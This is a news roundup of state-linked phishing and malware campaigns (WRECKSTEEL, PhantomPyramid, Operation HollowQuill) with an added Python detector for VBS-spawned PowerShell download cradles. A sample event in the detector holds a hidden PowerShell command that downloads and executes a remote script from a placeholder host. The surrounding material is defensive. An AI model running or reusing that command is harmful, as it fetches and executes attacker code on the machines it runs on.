According to a report by the Computer Emergency Response Team of Ukraine (CERT-UA), the country has experienced at least three cyber attacks targeting state administration bodies and critical infrastructure facilities. The primary goal of these attacks is to steal sensitive information.
The campaign involves the use of compromised email accounts to send phishing messages with links to legitimate services such as DropMeFiles and Google Drive. Additionally, the links are sometimes embedded within PDF attachments to deceive the recipients.
The phishing messages aim to create a sense of urgency, claiming that a Ukrainian government agency plans to cut salaries. The recipients are then urged to click on the link to view the list of affected employees, which ultimately leads to the download of a Visual Basic Script (VBS) loader.
The VBS loader is designed to fetch and execute a PowerShell script, which is capable of harvesting files matching specific extensions and capturing screenshots. The activity has been attributed to a threat cluster tracked as UAC-0219, which has been ongoing since at least fall 2024.
CERT-UA has given the VBS loader and the PowerShell malware the moniker WRECKSTEEL. However, the attacks have not been attributed to any specific country.
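The WRECKSTEEL chain described above (a phishing link delivers a VBS loader, which fetches and runs a PowerShell script) leaves a recognisable process tree: a Windows script host spawning PowerShell with download-cradle arguments. The following is an added detection example, not CERT-UA's code or any indicator from the report; the event field names and all sample hosts, paths and URLs are constructed assumptions.

```python
"""Added detection example (not CERT-UA's code) for the chain above: a VBS loader
run by wscript.exe/cscript.exe spawns PowerShell to fetch the next stage.
Event field names are assumptions, not a real product schema."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # hosts that execute a .vbs loader
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Fragments typical of PowerShell used as a download cradle (case-insensitive).
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|"
    r"Invoke-RestMethod|\birm\b|-enc(odedcommand)?\b", re.IGNORECASE)

def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev):
    """Return (severity, reason) for one process-creation event, or None."""
    if basename(ev["image"]) not in POWERSHELL:
        return None
    from_script_host = basename(ev["parent_image"]) in SCRIPT_HOSTS
    cradle = DOWNLOAD_RE.search(ev["command_line"]) is not None
    if from_script_host and cradle:
        return ("high", "script host spawned PowerShell download cradle")
    if from_script_host:
        return ("medium", "script host spawned PowerShell")
    if cradle:
        return ("low", "PowerShell download cradle")
    return None

def detect(events):
    """Apply score_event to every event and return the alerts in order."""
    alerts = []
    for ev in events:
        hit = score_event(ev)
        if hit:
            alerts.append({"host": ev["host"], "pid": ev["pid"], "severity": hit[0], "reason": hit[1]})
    return alerts

# Constructed sample events; hosts, paths and the URL are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "ws01", "pid": 4120, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": PS, "command_line": "powershell -nop -w hidden -c \"IEX (New-Object "
     "Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""},
    {"host": "ws02", "pid": 5533, "parent_image": r"C:\Windows\explorer.exe",
     "image": PS, "command_line": r"powershell -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Only the first sample event is flagged (severity high); the benign explorer-launched script run produces no alert, and a script host launching a non-PowerShell child is ignored by design.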
Kaspersky has also warned of a threat actor known as Head Mare, which has targeted several Russian entities with a malware known as PhantomPyramid. This malware is capable of processing instructions issued by the operator over a command-and-control (C2) server and downloading additional payloads like MeshAgent.
Russian energy companies, industrial enterprises, and organizations that supply and develop electronic components have been targeted by a threat actor codenamed Unicorn, which dropped a VBS trojan designed to siphon files and images from infected hosts.
SEQRITE Labs has revealed that academic, governmental, aerospace, and defense-related networks in Russia are being targeted by weaponized decoy documents, likely sent via phishing emails, as part of a campaign dubbed Operation HollowQuill. The attacks are believed to have started around December 2024.
The attacks use social engineering tactics, disguising malware-laced PDFs as research invitations and government communiqués to entice unsuspecting users into triggering the attack chain.
Security researcher Subhajeet Singha explained that the threat entity delivers a malicious RAR file containing a .NET malware dropper, which further drops a Golang-based shellcode loader along with the legitimate OneDrive application and a decoy-based PDF with a final Cobalt Strike payload.